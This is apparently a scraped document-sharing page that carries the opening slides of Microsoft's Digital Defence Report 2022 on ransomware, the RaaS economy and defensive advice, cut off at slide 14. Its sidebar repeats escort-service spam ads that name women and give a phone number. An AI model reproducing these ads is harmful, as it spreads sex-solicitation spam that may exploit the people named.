Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model SafeKarol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
Karol Bagh @ℂall @Girls ꧁❤ 9873777170 ❤꧂Glamorous sonam Mehra Top Model Safe
 
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model SafeGhaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
Ghaziabad @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Jya Khan Top Model Safe
 
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model SafePaharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
Paharganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Neha Singla Top Model Safe
 
ITR Filing for the year of the 2023-24 .pdf
ITR Filing for the year of the 2023-24 .pdfITR Filing for the year of the 2023-24 .pdf
ITR Filing for the year of the 2023-24 .pdf
 
2024_summer_my_dream_gnjp_20240705_ks.pdf
2024_summer_my_dream_gnjp_20240705_ks.pdf2024_summer_my_dream_gnjp_20240705_ks.pdf
2024_summer_my_dream_gnjp_20240705_ks.pdf
 
A Green City is an urban area that prioritizes sustainability
A Green City is an urban area that prioritizes sustainabilityA Green City is an urban area that prioritizes sustainability
A Green City is an urban area that prioritizes sustainability
 
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model SafeDaryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
Daryaganj @ℂall @Girls ꧁❤ 9873777170 ❤꧂VIP Ruhi Singla Top Model Safe
 
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model SafeDwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
Dwarka @ℂall @Girls ꧁❤ 9873777170 ❤꧂Fabulous sonam Mehra Top Model Safe
 

original.pdf

  • 1. Microsoft Digital Defence Report 2022 Illuminating the threat landscape and empowering a digital defence.
  • 2. Contents The data, insights and events in this report are from July 2021 through June 2022 (Microsoft fiscal year 2022), unless otherwise noted. For the best experience viewing and navigating this report, we recommend using Adobe Reader, available as a free download from the Adobe website. Report Introduction 02 The State of Cybercrime 06 An overview of The State of Cybercrime 07 Introduction 08 Ransomware and extortion: A nation-level threat 09 Ransomware insights from front-line responders 14 Cybercrime-as-a-Service 18 The evolving phishing threat landscape 21 A timeline of botnet disruption from Microsoft’s early days of collaboration 25 Cybercriminal abuse of infrastructure 26 Is hacktivism here to stay? 28 Nation State Threats 30 An overview of Nation State Threats 31 Introduction 32 Background on nation state data 33 Sample of nation state actors and their activities 34 The evolving threat landscape 35 The IT supply chain as a gateway to the digital ecosystem 37 Rapid vulnerability exploitation 39 Russian state actors’ wartime cyber tactics threaten Ukraine and beyond 41 China expanding global targeting for competitive advantage 44 Iran growing increasingly aggressive following power transition 46 North Korean cyber capabilities employed to achieve regime’s three main goals 49 Cyber mercenaries threaten the stability of cyberspace 52 Operationalising cybersecurity norms for peace and security in cyberspace 53 Devices and Infrastructure 56 An overview of Devices and Infrastructure 57 Introduction 58 Governments acting to improve critical infrastructure security and resilience 59 IoT and OT exposed: Trends and attacks 62 Supply chain and firmware hacking 65 Spotlight on firmware vulnerabilities 66 Reconnaissance-based OT attacks 68 Cyber Influence Operations 71 An overview of Cyber Influence Operations 72 Introduction 73 Trends in cyber influence operations 74 Influence operations during the COVID-19 pandemic and Russia’s invasion of Ukraine 76 Tracking the Russian Propaganda Index 78 Synthetic media 80 A holistic approach to protect against cyber influence operations 83 Cyber Resilience 86 An overview of Cyber Resilience 87 Introduction 88 Cyber resiliency: A crucial foundation of a connected society 89 The importance of modernising systems and architecture 90 Basic security posture is a determining factor in advanced solution effectiveness 92 Maintaining identity health is fundamental to organisational well-being 93 Operating system default security settings 96 Software supply chain centrality 97 Building resilience to emerging DDoS, web application and network attacks 98 Developing a balanced approach to data security and cyber resiliency 101 Resilience to cyber influence operations: The human dimension 102 Fortifying the human factor with skilling 103 Insights from our ransomware elimination program 104 Act now on quantum security implications 105 Integrating business, security and IT for greater resilience 106 The cyber resilience bell curve 108 Contributing Teams 110 01 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 3. Foreign actors are also using highly effective techniques to enable propaganda influence operations in regions around the globe, as covered in the third chapter. For example, Russia has worked hard to convince its citizens, and the citizens of many other countries, that its invasion of Ukraine was justified – while also sowing propaganda discrediting COVID vaccines in the West and simultaneously promoting their effectiveness at home. In addition, actors are increasingly targeting Internet of Things (IoT) devices or Operational Technology (OT) control devices as entry points to networks and critical infrastructure which is discussed in chapter four. Finally, in the last chapter, we provide the insights and lessons we have learned from over the past year defending against attacks directed at Microsoft and our customers as we review the year’s developments in cyber resilience. Each chapter provides the key lessons learned and insights based on Microsoft’s unique vantage point. The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe. Microsoft is taking action to defend our customers and the digital ecosystem against these threats, and you can read about our technology that identifies and blocks billions of phishing attempts, identity thefts and other threats to our customers. A snapshot of our landscape… Scope and scale of threat landscape The volume of password attacks has risen to an estimated 921 attacks every second – a 74% increase in just one year. Dismantling cybercrime To date, Microsoft removed more than 10,000 domains used by cybercriminals and 600 used by nation state actors. Addressing vulnerabilities 93% of our ransomware incident response engagements revealed insufficient controls on privilege access and lateral movement. “The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe” On February 23, 2022, the cybersecurity world entered a new age, the age of the hybrid war. On that day, hours before missiles were launched and tanks rolled across borders, Russian actors launched a massive destructive cyberattack against Ukrainian government, technology and financial sector targets. You can read more about these attacks and the lessons to be learned from them in the Nation State Threats chapter of this third annual edition of the Microsoft Digital Defence Report (MDDR). Key among those lessons is that the cloud provides the best physical and logical security against cyberattacks and enables advances in threat intelligence and end point protection that have proven their value in Ukraine. While any survey of the year’s developments in cybersecurity must begin there, this year’s report provides a deep dive into much more. In the report’s first chapter, we focus on activities of cybercriminals, followed by nation state threats in chapter two. Both groups have greatly increased the sophistication of their attacks which has dramatically increased the impact of their actions. While Russia drove headlines, Iranian actors escalated their attacks following a transition of presidential power, launching destructive attacks targeting Israel and ransomware and hack-and-leak operations targeting critical infrastructure in the United States. China also increased its espionage efforts in Southeast Asia and elsewhere in the global south, seeking to counter US influence and steal critical data and information. Introduction by Tom Burt Corporate Vice President, Customer Security & Trust 02 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 4. The state of cybercrime Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. Find out more on p6 Nation state threats Nation state actors are launching increasingly sophisticated cyberattacks designed to evade detection and further their strategic priorities. The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict. Russia has also supported its war with information influence operations, using propaganda to impact opinions in Russia, Ukraine and globally. Outside Ukraine, nation state actors have increased activity and have begun using advancements in automation, cloud infrastructure and remote access technologies to attack a wider set of targets. Corporate IT supply chains that enable access to ultimate targets were frequently attacked. Cybersecurity hygiene became even more critical as actors rapidly exploited unpatched vulnerabilities, used both sophisticated and brute force techniques to steal credentials and obfuscated their operations by using opensource or legitimate software. In addition, Iran joins Russia in the use of destructive cyberweapons, including ransomware, as a staple of their attacks. These developments require urgent adoption of a consistent, global framework that prioritises human rights and protects people from reckless state behaviour online. All nations must work together to implement norms and rules for responsible state conduct. Find out more on p30 Devices and infrastructure The pandemic, coupled with rapid adoption of internet-facing devices of all kinds as a component of accelerating digital transformation, has greatly increased the attack surface of our digital world. As a result, cybercriminals and nation states are quickly taking advantage. While the security of IT hardware and software has strengthened in recent years, the security of IoT and OT devices security has not kept pace. Threat actors are exploiting these devices to establish access on networks and enable lateral movement, to establish a foothold in a supply chain or to disrupt the target organisation’s OT operations. Find out more on p56 We also use legal and technical means to seize and shut down infrastructure used by cybercriminals and nation state actors and notify customers when they are being threatened or attacked by a nation state actor. We work to develop increasingly effective features and services that use AI/ML technology to identify and block cyber threats and security professionals defend against and identify cyber-intrusions more rapidly and effectively. Perhaps most importantly, throughout the MDDR we offer our best advice on the steps individuals, organisations and enterprises can take to defend against these increasing digital threats. Adopting good cyber hygiene practices is the best defence and can significantly reduce the risk of cyberattacks. Introduction by Tom Burt Continued ‘The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict.’ 03 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 5. 34.7 bn identity threats blocked 37 bn email threats blocked 2.5 bn endpoint signals analysed daily 43 tn signals synthesised daily, using sophisticated data analytics and AI algorithms to understand and protect against digital threats and criminal cyberactivity. 8,500+ engineers, researchers, data scientists, cybersecurity experts, threat hunters, geopolitical analysts, investigators and frontline responders across 77 countries. 15,000+ partners in our security ecosystem who increase cyber resilience for our customers. Cyber resilience Security is a key enabler of technological success. Innovation and enhanced productivity can only be achieved by introducing security measures that make organisations as resilient as possible against modern attacks. The pandemic has challenged us at Microsoft to pivot our security practices and technologies to protect our employees wherever they work. This past year, threat actors continued to take advantage of vulnerabilities exposed during the pandemic and the shift to a hybrid work environment. Since then, our principal challenge has been managing the prevalence and complexity of various attack methods and increased nation state activity. In this chapter, we detail the challenges we have faced, and the defences we have mobilised in response with our more than 15,000 partners. Find out more on p86 Our unique vantage point July 1, 2021 through June 30, 2022 Introduction by Tom Burt Continued Cyber influence operations Nation states are increasingly using sophisticated influence operations to distribute propaganda and impact public opinion both domestically and internationally. These campaigns erode trust, increase polarisation and threaten democratic processes. Skilled Advanced Persistent Manipulator actors are using traditional media together with internet and social media to vastly increase the scope, scale and efficiency of their campaigns, and the outsized impact they are having in the global information ecosystem. In the past year, we have seen these operations used as part of Russia’s hybrid war in Ukraine, but have also seen Russia and other nations, including China and Iran, increasingly deploy propaganda operations powered by social media to extend their global influence on a range of issues. Find out more on p71 04 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 6. We believe Microsoft – independently and through close partnerships with others in private industry, government and civil society – has a responsibility to protect the digital systems that underpin the social fabric of our society and promote safe, secure computing environments for every person, wherever they are located. This responsibility is the reason we have published the MDDR each year since 2020. The report is the culmination of Microsoft’s vast data and comprehensive research. It shares our unique insights on how the digital threat landscape is evolving and the crucial actions that can be taken today to improve the security of the ecosystem. We hope to instil a sense of urgency, so readers take immediate action based on the data and insights we present both here and in our many cybersecurity publications throughout the year. As we consider the gravity of the threat to the digital landscape – and its translation into the physical world – it is important to remember that we are all empowered to take action to protect ourselves, our organisations and enterprises against digital threats. Introduction by Tom Burt Continued Thank you for taking the time to review this year’s Microsoft Digital Defence Report. We hope you will find that it provides valuable insight and recommendations to help us collectively defend the digital ecosystem. Tom Burt Corporate Vice President, Customer Security & Trust Our objective with this report is twofold: 1 To illuminate the evolving digital threat landscape for our customers, partners and stakeholders spanning the broader ecosystem, shining a light on both new cyberattacks and evolving trends in historically persistent threats. 2   To empower our customers and partners to improve their cyber resiliency and respond to these threats. 05 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 7. The State of Cybercrime As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques. An overview of The State of Cybercrime 07 Introduction 08 Ransomware and extortion: A nation-level threat 09 Ransomware insights from front-line responders 14 Cybercrime-as-a-Service 18 The evolving phishing threat landscape 21 A timeline of botnet disruption from Microsoft’s early days of collaboration 25 Cybercriminal abuse of infrastructure 26 Is hacktivism here to stay? 28 06 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Nation State Threats Report Introduction Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Nation State Threats Report Introduction
  • 8. An overview of The State of Cybercrime As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques. Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. The threat of ransomware and extortion is becoming more audacious with attacks targeting governments, businesses and critical infrastructure. Human operated ransomware is most prevalent, as one-third of targets are successfully compromised by criminals using these attacks and 5% of those are ransomed. Cybercrime continues to rise as the industrialisation of the cybercrime economy lowers the skill barrier to entry by providing greater access to tools and infrastructure. Credential phishing schemes which indiscriminately target all inboxes are on the rise and business email compromise, including invoice fraud, poses a significant cybercrime risk for enterprises. To disrupt the malicious infrastructures of cybercriminals and nation state actors, Microsoft relies on innovative legal approaches and our public and private partnerships. Find out more on p9 Find out more on p18 Attackers increasingly threaten to disclose sensitive data to encourage ransom payments. Find out more on p10 Find out more on p21 Find out more on p25 Find out more on p9 The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services. Affiliates are generally small groups of people “affiliated” with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems, and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration. Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force, or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialize in high-value network access, while lower tier brokers on the dark web might have just 1–2 usable stolen credentials for sale. Organizations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen. Operators Access brokers Understanding the ransomware economy Affiliates Conti HIVE Black Matter LockBit REvil BlackCat falls victim to a successful ransomware event are successfully compromised Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack RaaS affiliates prioritise targets by intended impact or perceived profit Attackers take advantage of any security weakness they find in the network, so attacks vary The ransomware payload is the culmination of a chain of malicious activity encounter activity associated with known ransomware attackers potential target organisations 1 20 60 2,500 Factors Low barrier to entry Human operated ransomware targeting and rate of success model p15 The most effective defence against ransomware includes multifactor authentication, frequent security patches and Zero Trust principles across network architecture. Find out more on p13 Ransomware Pre-ransomware 2022 BEC Themes (January-June 202 9.3% 1.9% Gift card scam Invoice fraud 4.6% Payroll redirection 4.3% Business information 07 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 9. As cyber defences improve and more governments and businesses take a proactive approach to prevention, we see attackers using two strategies to gain access required to facilitate cybercrime. One approach is a campaign with broad targets that relies on volume. The other uses surveillance and more selective targeting to increase the rate of return. Even when revenue generation is not the objective – such as nation state activity for geopolitical purposes – both random and targeted attacks are used. This past year, cybercriminals continued to rely on social engineering and exploitation of topical issues to maximise the success of campaigns. For example, while COVID-themed phishing lures were used less frequently, we observed lures soliciting donations to support the citizens of Ukraine increasing. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. We have observed cybercriminals becoming more frugal and attackers are no longer paying for technology. To lower their overhead and boost the appearance of legitimacy, some attackers increasingly seek to compromise businesses to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. In this chapter, we also examine the rise in hacktivism, a disruption caused by private citizens conducting cyberattacks to further social or political goals. Thousands of individuals around the world, both experts and novices, have mobilised since February 2022 to launch attacks such as disabling websites and leaking stolen data as part of the Russia-Ukraine war. It is too soon to predict whether this trend will continue after the end of active hostilities. Organisations must regularly review and strengthen access controls and implement security strategies to defend against cyberattacks. However, that is not all they can do. We explain how our Digital Crimes Unit (DCU) has used civil cases to seize malicious infrastructure used by cybercriminals and nation state actors. We must fight this threat together through both public and private partnerships. We hope that by sharing what we have learned over the past 10 years, we will help others understand and consider the proactive measures they can take to protect themselves and the wider ecosystem against the continually growing threat of cybercrime. Amy Hogan-Burney General Manager, Digital Crimes Unit Cybercrime continues to rise, with increases in both random and targeted attacks. Introduction 08 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 10. falls victim to a successful ransomware event are successfully compromised Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack RaaS affiliates prioritise targets by intended impact or perceived profit Attackers take advantage of any security weakness they find in the network, so attacks vary The ransomware payload is the culmination of a chain of malicious activity encounter activity associated with known ransomware attackers potential target organisations 1 20 60 2,500 Factors Low barrier to entry Human operated ransomware targeting and rate of success model p15 • Also in May, an attack caused flight delays and cancellations for one of India’s largest airlines, leaving hundreds of passengers stranded.4 The success of these attacks and the extent of their real-world impacts are the result of an industrialisation of the cybercrime economy, enabling access to tooling and infrastructure and expanding cybercriminal capabilities by lowering their skill barrier to entry. In recent years, ransomware has moved from a model where a single ‘gang’ would both develop and distribute a ransomware payload to the Ransomware as-a-Service (RaaS) model. RaaS allows one group to manage the development of the ransomware payload and provide services for payment and extortion via data leakage to other cybercriminals – the ones who actually launch the ransomware attacks – referred to as ‘affiliates’ for a cut of the profits. This franchising of the cybercrime economy has expanded the attacker pool. The industrialisation of cybercriminal tooling has made it easier for attackers to perform intrusions, exfiltrate data and deploy ransomware. Human operated ransomware5 – a term coined by Microsoft researchers to describe threats driven by humans who make decisions at every stage of the attacks based on what they discover in their target’s network and delineate the threat from commodity ransomware attacks – remains a significant threat to organisations. Ransomware and extortion: A nation-level threat Ransomware attacks pose an increased danger to all individuals as critical infrastructure, businesses of all sizes and state and local governments are targeted by criminals leveraging a growing cybercriminal ecosystem. Over the past two years, high profile ransomware incidents – such as those involving critical infrastructure, healthcare and IT service providers – have drawn considerable public attention. As ransomware attacks have become more audacious in scope, their effects have become more wide ranging. The following are examples of attacks we’ve seen already in 2022: • In February, an attack on two companies affected the payment processing systems of hundreds of petrol stations in northern Germany.1 • In March, an attack against Greece’s postal service temporarily disrupted mail delivery and impacted the processing of financial transactions.2 • In late May, a ransomware attack against Costa Rican government agencies forced a national emergency to be declared after hospitals were shut down and customs and tax collection disrupted.3 Model based on Microsoft Defender for Endpoint (EDR) data (January-June 2022). 09 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 11. Digital threat activity is at an all-time high and the level of sophistication increases every day. Expanding relationships between specialised cybercriminals have increased the pace, sophistication and success of ransomware attacks. This has driven the evolution of the cybercriminal ecosystem into connected players with different techniques, goals and skillsets that support each other on initial access to targets, payment services and decryption or publication tools or sites. Ransomware operators can now purchase access to organisations or government networks online or obtain credentials and access via interpersonal relationships with brokers whose main objective is solely to monetise the access they have gained. The operators then use the purchased access to deploy a ransomware payload bought via dark web marketplaces or forums. In many cases, negotiations with victims are conducted by the RaaS team, not the operators themselves. These criminal transactions are seamless and the participants risk little chance of being arrested and charged due to the anonymity of the dark web and difficulty enforcing laws transnationally. A sustainable and successful effort against this threat will require a whole-of-government strategy to be executed in close partnership with the private sector. Ransomware attacks have become even more impactful as the adoption of a double extortion monetisation strategy has become a standard practice. This involves exfiltrating data from compromised devices, encrypting the data on the devices and then posting or threatening to post the stolen data publicly to pressure victims into paying a ransom. Although most ransomware attackers opportunistically deploy ransomware to whatever network they get access, some purchase access from other cybercriminals, leveraging connections between access brokers and ransomware operators. Our unique breadth of signal intelligence is gathered from multiple sources – identity, email, endpoints and cloud – and provides insight into the growing ransomware economy, complete with an affiliate system which includes tools designed for less technically-abled attackers. Ransomware and extortion: A nation-level threat Continued 10 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 12. Contrary to how ransomware is sometimes portrayed in the media, it is rare for a single ransomware variant to be managed by one end-to-end ‘ransomware gang’. Instead, there are separate entities that build malware, gain access to victims, deploy ransomware and handle extortion negotiations. The industrialisation of the criminal ecosystem has led to: • Access brokers that break in and hand off access (Access-as-a-Service). • Malware developers that sell tooling. • Criminal operators and affiliates that conduct intrusions. • Encryption and extortion service providers that take over monetisation from affiliates (RaaS). All human-operated ransomware campaigns share common dependencies on security weaknesses. Specifically, attackers usually take advantage of an organisation’s poor cyber hygiene, which often includes infrequent patching and failure to implement multifactor authentication (MFA). The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure and cryptocurrency transaction services. Affiliates are generally small groups of people ‘affiliated’ with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration. Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialise in high-value network access, while lower tier brokers on the dark web might have just one-to-two usable stolen credentials for sale. Organisations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen. Operators Access brokers Understanding the ransomware economy Affiliates Conti HIVE Black Matter LockBit REvil BlackCat 11 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 13. Case study: The dissolution of Conti Conti, one of the top ransomware variants over the past two years, began shutting down operations in mid-2022, with the Microsoft Threat Intelligence Centre (MSTIC) observing a significant decrease in activity in late March and early April. We observed the last Conti ransomware deployments in mid-April. However, much like the shuttering of other ransomware operations, Conti’s dissolution did not have a significant impact on ransomware deployments, as MSTIC observed Conti affiliates pivoting to deploy other ransomware payloads, including BlackBasta, Lockbit 2.0, LockbitBlack and HIVE. This is consistent with data from previous years and suggests that when ransomware gangs go offline, they re-emerge months later or redistribute their technical capabilities and resources to new groups. Our Microsoft threat intelligence teams track ransomware threat actors as individual groups (labelled as DEVs) based on their specific tools, rather than tracking them by the malware they use. This meant that when Conti’s affiliates dispersed, we were able to continue tracking these DEVs through their use of other tools or RaaS kits. For example: • DEV-0230, which is affiliated with Trickbot, had been a prolific user of Conti. In late April, MSTIC observed it using QuantumLocker. • DEV-0237 shifted from Conti’s ransomware kit to HIVE and Nokoyawa, including using HIVE in the May 31 attack against Costa Rican government agencies. • DEV-0506, another prolific user of the Conti ransomware kit, was observed using BlackBasta. Example of an affiliate (DEV-0237) quickly shifting between RaaS programs After a RaaS program such as Conti is shut down, the ransomware affiliate shifts to another one (Hive) almost immediately. Jan Ryuk 2020-Jun 2021 Hive Oct 2021-present BlackCat Mar 2022-present Nokoyawa May 2022-present Agenda etc. June 2022 (experimenting) 2021 2022 Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun Conti Jul-Oct 2021 RaaS evolves the ransomware ecosystem and hinders attribution Because human-operated ransomware is driven by individual operators, attack patterns vary based on the target and alternate throughout the duration of an attack. In the past, we observed a close relationship between the initial entry vector, tools and ransomware payload choices in each campaign of a single ransomware strain. This made attribution easier. The RaaS affiliate model, however, decouples this relationship. As a result, Microsoft tracks ransomware affiliates deploying payloads in specific attacks, rather than tracking the ransomware payload developers as operators. Put another way, we no longer assume the HIVE developer is the operator behind a HIVE ransomware attack; it is more likely to be an affiliate. The cybersecurity industry has struggled to adequately capture this delineation between developers and operators. The industry still often reports a ransomware incident by its payload name, giving the false impression that a single entity, or ransomware gang, is behind all attacks using that particular ransomware payload, and all incidents associated with it share common techniques and infrastructure. To support network defenders, it is important to learn more about the stages that precede different affiliates’ attacks – such as data exfiltration and additional persistence mechanisms – and the detection and protection opportunities that might exist. More so than malware, attackers need credentials to succeed in their operations. The successful human operated ransomware infection of an entire organisation relies on access to a highly privileged account. 12 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 14. Spotlight on human-operated ransomware attacks Over the past year, Microsoft’s ransomware experts conducted deep investigations into more than 100 human- operated ransomware incidents to track attackers’ techniques and understand how to better protect our customers. It is important to note that the analysis we share here is possible only for onboarded, managed, devices. Non-onboarded, unmanaged devices represent the least secure part of an organisation’s hardware assets. A durable security strategy Combating and preventing attacks of this nature requires a shift in an organisation’s mindset to focus on the comprehensive protection required to slow and stop attackers before they can move from the pre-ransomware phase to the ransomware deployment phase. Enterprises must apply security best practices consistently and aggressively to their networks, with the goal of mitigating classes of attacks. Due to the human decision making these ransomware attacks can generate multiple, seemingly disparate security product alerts which can easily get lost or not responded to in time. Alert fatigue is real, and security operations centres (SOCs) can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats cannot only reduce alert volume, but also stop many attackers before they get access to networks. Organisations must maintain continuous high standards of security posture and network hygiene to protect themselves from human-operated ransomware attacks. The typical human-operated attack Human-operated ransomware attacks can be categorised into the pre-ransomware phase and the ransomware deployment phase. During the pre-ransomware phase, attackers prepare to infiltrate the network by learning about the organisation’s typology and security infrastructure. Deployment! Stop the attackers before they reach the ransomware deployment phase Attackers prepare to infiltrate the network by learning as much as possible about the topology and security infrastructure. Attackers may also exfiltrate data in this phase. Attackers aim to encrypt as much data as possible. This phase can last only minutes. This phase can range from a few days to several weeks or months, although it has been shortening over the past two years. Ransomware Pre-ransomware Our investigations found most actors behind human-operated ransomware attacks take advantage of similar security weaknesses and share common attack patterns and techniques. Most prevalent ransomware phase techniques: 75% Use admin tools. 75% Use acquired elevated compromised user account to spread malicious payloads through SMB protocol. 99% Attempt to tamper with discovered security and backup products using OS-built tools. Actionable insights Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy. 1 Build credential hygiene. More so than malware, attackers need credentials to succeed in their operations. The successful human-operated ransomware infection of an entire organisation relies on access to a highly privileged account like a Domain Administrator, or abilities to edit a Group Policy. 2 Audit credential exposure. 3 Prioritise deployment of Active Directory updates. 4 Prioritise cloud hardening. 5 Reduce the attack surface. 6 Harden internet-facing assets and understand your perimeter. 7 Reduce SOC alert fatigue by hardening your network to reduce volume and preserve bandwidth for high priority incidents. Links to further information RaaS: Understanding the cybercrime gig economy and how to protect yourself | Microsoft Security Blog Human-operated ransomware attacks: A preventable disaster | Microsoft Security Blog 13 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and 